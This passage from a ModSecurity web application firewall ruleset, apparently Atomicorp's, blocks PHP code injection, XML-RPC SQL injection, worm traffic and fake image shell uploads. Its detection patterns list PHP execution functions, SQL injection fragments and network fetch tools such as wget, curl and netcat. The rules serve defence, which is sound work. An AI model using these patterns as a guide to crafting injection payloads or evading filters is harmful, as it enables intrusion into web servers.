?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64|rot13|base64_url_decode|gz(?:inflate|decode|uncompress)|strrev|zlib_\w+)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$)|< ?\? ?= ?system ?\( ?\$_|die\(\@(?:md5|sha))" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:removecomments,t:removeWhiteSpace,t:lowercase,capture,id:340095,rev:54,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0},%{matched_var_name}'"

SecMarker END_RULE_340095

SecRule REQUEST_URI "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64|rot13|base64_url_decode|gz(?:inflate|decode|uncompress)|strrev|zlib_\w+)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$)|< ?\? ?= ?system ?\( ?\$_|die\(\@(?:md5|sha))" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:removecomments,t:removeWhiteSpace,t:lowercase,capture,id:340087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in URL - this may be an attack.',logdata:'%{TX.0},%{matched_var_name}'"

# Rule 340077: PHP defenses
SecRule ARGS|!ARGS:operate|!ARGS:search_keywords|!ARGS:templatecode|!ARGS:areas "^(?:globals(?:$|\[)|php:/)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:removeWhiteSpace,t:lowercase,id:340077,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: PHP policy violation'"
SecMarker END_PHP_CODE_INJECTION_ATTACKS_NOT_PERL


# Rule 340096: PHP policy violation
SecRule ARGS_NAMES "^php:/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,id:340096,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: PHP policy violation',logdata:'%{TX.0}'"

# Rule 340027: Genenric PHP body attack
#SecRule REQUEST_BODY "(?:chr|fwrite|fopen|system|echr|passthru|php_uname|include|popen|proc_open|shell_exec|mysql_query|exec|eval|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|reg_replace) ?\( ?'?" 	"t:none,t:urlDecodeUni,t:lowercase,capture,chain,id:340027,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic php body attack attempt',logdata:'%{TX.0}'"
#SecRule REQUEST_BODY "(?:(?:cd|mkdir)[[:space:]]+(?:/|[a-z|0-9]|\.)*|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z])"
#
SecRule REQUEST_URI "(?:/admin/structure|^/node/(?:add|[0-9]+)/(?:page|edit)|^/administrator/index\.php\?option=com_hikashop$|^/admin/cms/pages/(?:edit|add)|^/admin\.php\?templates/save)"  "t:none,t:lowercase,phase:2,id:374358,pass,nolog,noauditlog,skipAfter:END_RULE_340128"

# Rule 340128: Slightly tighter version of the above
SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:/shortcode/|!ARGS:templatecode|!ARGS:areas "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:removeComments,t:compressWhitespace,t:lowercase,capture,chain,id:340128,rev:25,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',logdata:'%{TX.0}'"
SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/shortcode/|!ARGS:templatecode|!ARGS:areas|!ARGS:file|!ARGS:/script/|!ARGS:description|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:solution|!ARGS:problem|!ARGS:view|!ARGS:/^body/|!ARGS:payment_extrainfo|!ARGS:server_validation|!ARGS:solution|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:resolution|!ARGS:message|!ARGS:/template/|!ARGS:msg|!ARGS:/php/|!ARGS:gen_header|!ARGS:/layout/|!ARGS:post|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:footerfile|!ARGS:/descr/|!ARGS:titleMetatags|!ARGS:/content/|!ARGS:/^eip_/|!ARGS:/jform/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|include|php_uname|popen|proc_open|shell_exec|mysql_query|eval|create_function|str_rot13|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+|base64_decode|base64_url_decode|decode_base64|zlib_\w+|strrev) ?(?:\(|\: ?'?)|system\( ?getenv ?\( ?http_php|(?:fputs|fread) ?\(|chr ?\(.{1,255}\).chr ?\(.{1,255}\).chr\()"  "t:none,t:urlDecodeUni,t:removeComments,t:compressWhitespace,t:lowercase"

SecMarker END_RULE_340128

# Rule 340129: Generic PHP attack sig
#SecRule REQUEST_BODY|REQUEST_URI "system\( ?getenv ?\( ?http_php ?\) ?\)" 	"id:340129,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP attack sig'"

# Rule 340131: Generic PHP payload command injection and upload vulnerabilities
#SecRule REQUEST_BODY|REQUEST_URI|ARGS|!ARGS:suffix|!ARGS:prefix "(?:< ?[?%] ?|\[ ?php)"	"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340131,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP payload command injection and upload vulnerabilities',chain"
#SecRule REQUEST_BODY|REQUEST_URI|ARGS|!ARGS:suffix|!ARGS:prefix  "(?:(?:fputs|fread) ?\(.*\)\;|fsockopen ?\( ?gethostbyname|chr ?\(.*\).chr ?\(.*\).chr\(|f(?:close|gets) ?\(|(?:system|passthru|exec|eval|rot13) ?\()"

# Rule 340133: HTTP header PHP code injection attacks
SecRule REQUEST_HEADERS:Client-Ip|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "< ?[?%] ?|\[ ?php" "capture,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340133,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: HTTP header PHP code injection attack',logdata:'%{TX.0}'"

# Rule 340011:
#slightly tighter rules with narrower focus
SecRule REQUEST_HEADERS|!REQUEST_HEADERS:REFERER|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/cookie_desc/|!REQUEST_COOKIES_NAMES:/cookie_desc/ "(?:chr|fwrite|rot13|fopen|system|passthru|serialize|php_uname|popen|proc_open|shell_exec|exec|eval|create_function|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg) ?\( ?(?:\"|\')" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,capture,id:340011,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP exploit pattern denied',logdata:'%{TX.0}'"

# Rule 340005: Code injection via Headers
#SecRule REQUEST_HEADERS|!REQUEST_HEADERS:REFERER "(?:chr|fwrite|fopen|system|passthru|include|php_uname|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo) ?\(.*\) ?\;" 	"capture,id:340005,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Code Injection in Content-Length header',logdata:'%{TX.0}'"

# Rule 340010:
#Generic PHP exploit signatures
#SecRule REQUEST_BODY|REQUEST_URI "<\? ?php.*(?:chr|fwrite|fopen|system|echr|passthru|include|php_uname|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo) ?\(.*\)\;" 	"id:340010,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP exploit pattern denied'"


SecMarker END_PHP_CODE_INJECTION_ATTACKS_1

SecRule ARGS_NAMES|ARGS|XML:/*|!ARGS:areas|!ARGS:templatecode "@pm ftp_ fget fput gets scanf write open read gzencode gzdecode gzinflate gzwrite compress read session_start scandir readfile readgzfile readdir move_uploaded_file proc_ call_user_function $_post $_get $_sessio str_rot13 mfunc mclude dynamic-cached-content" "phase:2,id:333829,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334378,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_INJECTION_SPECIAL"

#PHP injection
SecRule ARGS_NAMES|ARGS|!ARGS:params.code|!ARGS:areas|!ARGS:templatecode|XML:/*|!ARGS:filecontent|!ARGS:/forbidden/|!ARGS:/descripcion/|!ARGS:/text/|!ARGS:/description/|!ARGS:/resolution/|!ARGS:codetocheck|!ARGS:ausgabe|!ARGS:/message/|!ARGS:/information/|!ARGS:/msg/|!ARGS:content|!ARGS:file|!ARGS:/jform/|!ARGS:ticket[body]|!ARGS:parent_name|!ARGS:/data/|!ARGS:/keyword/|!ARGS:search|!ARGS:/metadata/|!ARGS:/snippet/ "\b(f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|(?:g|b)z(?:(?:encod|writ)e|compress|open|read)|scandir|read(?:(?:(?:g|b)z)?file|dir)|gzinflate|move_uploaded_file|str_rot13|(?:proc_|bz)open|call_user_func|$_(?:(?:pos|ge)t|session))\b ?\(" "phase:2,deny,log,status:403,rev:15,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  PHP Injection Attack',id:'390715',logdata:'%{TX.0}',severity:'2'"
SecMarker END_PHP_INJECTION_SPECIAL

SecRule REQUEST_URI "(?:\?(?:q=node\/[0-9]+\/edit$|p=admin_cms&)|^/admin/cms/pages/(?:edit|add))" "t:none,t:lowercase,phase:2,id:351453,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_2"

#code injection attempt
SecRule ARGS|REQUEST_URI|XML:/*|!ARGS:areas|!ARGS:/template/ "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "id:333830,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334379,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_2"
SecRule ARGS|REQUEST_URI|XML:/*|!ARGS:pages|!ARGS:areas|!ARGS:thecode|!ARGS:code|!ARGS:templatecode|!ARGS:/script/|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:/^snippet/|!ARGS:server_validation|!ARGS:/template/|!ARGS:message|!ARGS:content|!ARGS:feed_body|!ARGS:source|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:msg|!ARGS:/content/|!ARGS:description|!ARGS:solution|!ARGS:problem|!ARGS:resolution|!ARGS:query|!ARGS:/^body/|!ARGS:/php/|!ARGS:suffix|!ARGS:prefix|!ARGS:summary|!ARGS:footerfile|!ARGS:/header/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/descr/|!ARGS:message  "(?:include ?\( ?(?:\"|\')? ?http|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gze?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|php_uname|preg_\w+|\bexecute)\s*(?:\"|\(|@|\: ?'?))" "phase:2,deny,log,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt',id:380018,rev:26,logdata:'%{TX.0}',severity:'2'"
SecMarker END_PHP_CODE_INJECTION_ATTACKS_2

SecRule REQUEST_URI "^/wp-admin/$" "phase:2,id:334384,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_3"

#code injection attempt base64encoded
SecRule REQUEST_BODY|ARGS|REQUEST_URI|XML:/*|!ARGS:areas|!ARGS:templatecode "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "id:333831,phase:2,t:none,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334380,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_3"

SecRule REQUEST_BODY|ARGS|REQUEST_URI|XML:/*|!ARGS:areas|!ARGS:templatecode|!ARGS:pages|!ARGS:p_upload_value|!ARGS:SAMLResponse|!ARGS:server_validation|!ARGS:/script/|!ARGS:SAMLResponse|!ARGS:filedata  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gze?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|include|php_uname|preg_\w+|execute)\s*(?:\"|\(|@|\: ?'?)" "phase:2,deny,log,status:403,t:none,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt - base64 encoded',id:380019,rev:8,logdata:'%{TX.0}',severity:'2'"

SecMarker END_PHP_CODE_INJECTION_ATTACKS_3


#code injection attempt hexencoded
SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:areas|!ARGS:templatecode "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "id:333832,phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334381,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4"

SecRule ARGS|!ARGS:/text/|!ARGS:/txt/|!ARGS:/^snippet/|!ARGS:/template/|!ARGS:message|!ARGS:server_validation|!ARGS:pages|!ARGS:content|!ARGS:msg|!ARGS:/content/|!ARGS:description|!ARGS:solution|!ARGS:problem|!ARGS:prefix|!ARGS:SAMLResponse|!ARGS:suffix|!ARGS:resolution|!ARGS:file|!ARGS:/php/|!ARGS:suffix|!ARGS:prefix|!ARGS:summary|!ARGS:footerfile|!ARGS:/template/|!ARGS:/header/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/descr/|!ARGS:message|!ARGS:p_upload_value|REQUEST_URI_RAW|XML:/*  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompres|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|include|php_uname|preg_\w+|execute)\s*(?:\"|\(|@|\: ?'?)" "phase:2,deny,log,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt - hex encoded',id:380020,rev:10,logdata:'%{TX.0}',severity:'2'"

SecMarker END_PHP_CODE_INJECTION_ATTACKS_4

#code injection attempt base64encoded impedence match
#SecRule MODSEC_BUILD "!@ge 020513900" "t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_5"
#
#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/* "(?:< ?[?%] ?|\[ ?php)"         "phase:2,t:none,t:urlDecodeUni,t:decodeBase64Ext,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
#        SecAction phase:2,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_5
#SecRule REQUEST_BODY|REQUEST_URI_RAW|XML:/*  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzencode|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|base64_decode|str_rot13|php_uname|file_get_contents|include|require|require_once|parse_ini_file|set|shell_exec|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|include|php_uname|preg_\w+|execute)\s*[\"\(@]" "t:none,t:urlDecodeUni,t:decodeBase64Ext,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt - base64 encoded',id:380018,rev:6,logdata:'%{TX.0}',severity:'2'"
#SecMarker END_PHP_CODE_INJECTION_ATTACKS_5

#################### XML RPC ATTACKS ####################
##types that do not have RFI at all
SecRule TX:STATIC "@eq 1" "phase:2,id:'333833',pass,t:none,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS"

#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" id:333833,phase:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS

#SecRule REQUEST_HEADERS:Content-Type "^(?:text|application)/xml"         "phase:1,t:none,t:lowercase,pass,nolog,noauditlog,ctl:requestBodyProcessor=XML"
#SecRule REQBODY_PROCESSOR "!^XML$" "phase:2,pass,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS"
SecRule XML:/* "@pm select grant delete drop do alter replace truncate update create rename describe table database index view union load_file inserttest remarktest convert execute insert varchar table declare char exit uname define fgets move_uploaded_file readfile ftp_put ftp_fget gzd?en?code gzinflate ftp_nb_put bzopen readdir gzread fopen ftp_nb_f(put|get) ftp_get scandir fscanf readgzfile fread proc_open fgetc fgetss ftp_fput ftp_nb_get session_start fwrite gzwrite gzopen gzcompress curl_multi_exec curl_exec eval create_function base64_decode base64_url_decode decode_base64 str_rot13 uname file_get_contents include parse_ini_file shell_exec mysql_query popen ini_ safe_mode phpinfo preg_ system exec passthru serialize file_get_contents '))" "id:333834,rev:2,phase:2,t:none,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334382,t:none,pass,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS"

# Rule 340118: Experimental XML-RPC generic attack sigs
# ',''));
SecRule XML:/* "(?:',''\)\)\;|< ?param ?> ?< ?name ?>.*\'\)\;)" "phase:2,log,auditlog,deny,log,status:403,t:none,t:lowercase,t:compressWhiteSpace,id:340118,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Generic XML-RPC attack'"

SecRule XML:/* "(?:(\w+)and(\w+)char\([0-9]+\)|\b(?:execute|convert) ?\(|(?:\;delete.{1,100};(?:insert|declare @|varchar)|(?:and .{1,100} \(select |\b(?:drop|create)(\w+)table|declare .{1,100} varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |\bcast\b ?\({1,100} as|xecresultset|' ?; ?declare @|; ?set @)"   "phase:2,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390636,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC SQL injection attack'"

# Rule 340121: Specific XML-RPC attacks on xmlrpc.php
SecRule XML:/* "(?:(?:(?:echo|uname) ?(?:\'|\")|; ?exit ?;)|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|include|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|php_uname|preg_\w+|execute) ?(?:\(|\: ?')|; ?(?:wget|ftpget|curl|fetch|lwp-(?:download|request|mirror|rget)|ncftp|ftp) ?(?:h|f)ttps?:/)"  "phase:2,capture,deny,status:403,log,auditlog,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340121,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: XML-RPC attacks on xmlrpc.php',logdata:'%{TX.0}'"

# Rule 340122: XML-RPC SQL injection generic signature
SecRule XML:/*  "(?:\b(?:select|grant|drop|alter|replace|truncate|create|rename|describe)\b[[:space:]]+[a-z|0-9|\*|,]+[[:space:]](?:from|into|table|database|index|view)|union select |union all select|select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\(|update [a-z0-9]+ set|delete from [a-z0-9]+ where)"  "phase:2,deny,status:403,log,auditlog,capture,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340122,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: XML-RPC SQL injection ',logdata:'%{TX.0}',tag:'SQLi'"


SecRule XML:/* "(?: ?eval\ ?\(|file_get_contents\ ?\(|\) ?;? exit ?;)" "phase:2,log,deny,log,status:403,auditlog,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390635,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC encoded command injection attack'"


SecRule XML:/* "@pm select grant delete drop do alter replace truncate update create rename describe table database index view union load_file inserttest remarktest convert execute insert varchar table declare char exit uname define fgets move_uploaded_file readfile ftp_put ftp_fget gzd?en?code gzinflate ftp_nb_put bzopen readdir gzread fopen ftp_nb_f(put|get) ftp_get scandir fscanf readgzfile fread proc_open fgetc fgetss ftp_fput ftp_nb_get session_start fwrite gzwrite gzopen gzcompress curl_multi_exec curl_exec eval create_function base64_decode base64_url_decode decode_base64 str_rot13 uname file_get_contents include parse_ini_file shell_exec mysql_query popen ini_ safe_mode phpinfo preg_ system exec passthru serialize file_get_contents " "id:333948,phase:2,t:none,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334383,t:none,pass,nolog,noauditlog,skipAfter:END_XML_RPC_ATTACKS_B64"

SecRule XML:/* "(?: ?eval\ ?\(|file_get_contents\ ?\(|\) ?;? exit ?;)" "phase:2,log,deny,log,status:403,auditlog,t:none,t:compressWhiteSpace,t:lowercase,id:393635,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC base64 encoded command injection attack'"

# Rule 340122: XML-RPC SQL injection generic signature
SecRule XML:/*  "(?:\b(?:select|grant|delete|drop|do|alter|replace|truncate|update|create|rename|describe)\b[[:space:]]+[a-z|0-9|\*|,]+[[:space:]](?:from|into|table|database|index|view)|union select |union all select|select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\()"  "phase:2,deny,status:403,log,auditlog,capture,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340123,rev:7,severity:2,msg:'Atomicorp.com WAF Rules: XML-RPC base64 encoded SQL injection ',logdata:'%{TX.0}',tag:'SQLi'"

# Rule 340120: XML-RPC generic attack sigs
SecRule XML:/* "(?:(?:(?:echo|uname) ?(?:\'|\")|; ?exit ?;)|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gzd?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|include|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|php_uname|preg_\w+|execute) ?(?:\(|\: ?'?)|; ?(?:wget|ftpget|curl|fetch|lwp-(?:download|request|mirror|rget)|ncftp|ftp) ?(?:h|f)ttps?:/)"  "phase:2,deny,status:403,log,auditlog,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,id:340120,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic XML-RPC  attack'"

SecRule XML:/* "(?:(\w+)and(\w+)char\([0-9]+\)|\b(?:execute|convert) ?\(|(?:\;delete.{1,100};(?:insert|declare @|varchar)|(?:and .{1,100} \(select |\b(?:drop|create)\b(\w+)table|declare .{1,100} varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select | \bcast\b\ ?\(.{1,100} as |xecresultset|' ?; ?declare\b @|; ?set @)" "phase:2,deny,status:403,log,auditlog,t:none,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:393636,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: XMLRPC base64 encoded SQL injection attack',tag:'SQLi'"

SecMarker END_XML_RPC_ATTACKS_B64

SecMarker END_XML_RPC_ATTACKS
################ WORM SIGS ###########################
#
# Rule 340134: wormsign
SecRule REQUEST_HEADERS "xxxxxx+\: \+\+\+\+\+\+\+\+\+\+\+\+\+" "phase:2,log,auditlog,deny,log,status:403,t:none,t:lowercase,id:340134,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Worm signature'"

#SecRule TX:STATIC "@eq 1" phase:2,id:'333835',pass,t:none,nolog,noauditlog,skipAfter:END_WORM_SIGS

#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" id:333835,phase:2,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_WORM_SIGS

#SecRule REQUEST_URI|ARGS|XML:/* "@pm thmc _ghc/rst_ "         "id:333836,t:none,t:urlDecodeUni,phase:2,pass,nolog,noauditlog,skip:1"
#        SecAction phase:2,id:334384,t:none,pass,nolog,noauditlog,skipAfter:END_WORM_SIGS

# Rule 340135: THMC worm
#SecRule REQUEST_URI|ARGS|XML:/* "(?:thmc\.\$dbhost\.thmc\.\$dbname\.thmc\.\$dbuser\.thmc\.\$dbpasswd\.thmc|echo _ghc/rst_)" 	"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340135,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: THMC or PHPBB worm'"

#SecMarker END_WORM_SIGS
################# IMAGE FILE CHECKS ######################

#SecRule REQUEST_HEADERS:Content-Type "(?:image/gif|image/jpg|image/png|image/bmp)"
SecRule REQUEST_HEADERS:Content-Type "image/" "phase:2,id:333837,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
        SecAction "phase:2,id:334385,t:none,pass,nolog,noauditlog,skipAfter:END_IMAGE_CHECKS"

# Rule 340138: Fake image file shell attacvk
SecRule REQUEST_BODY "(?:(?:chr|system|passthru|serialize|eval|create_function|exec) ?\(|< ?\? php)"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340138,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Fake image file shell attack'"

# Rule 340140: bogus graphics file
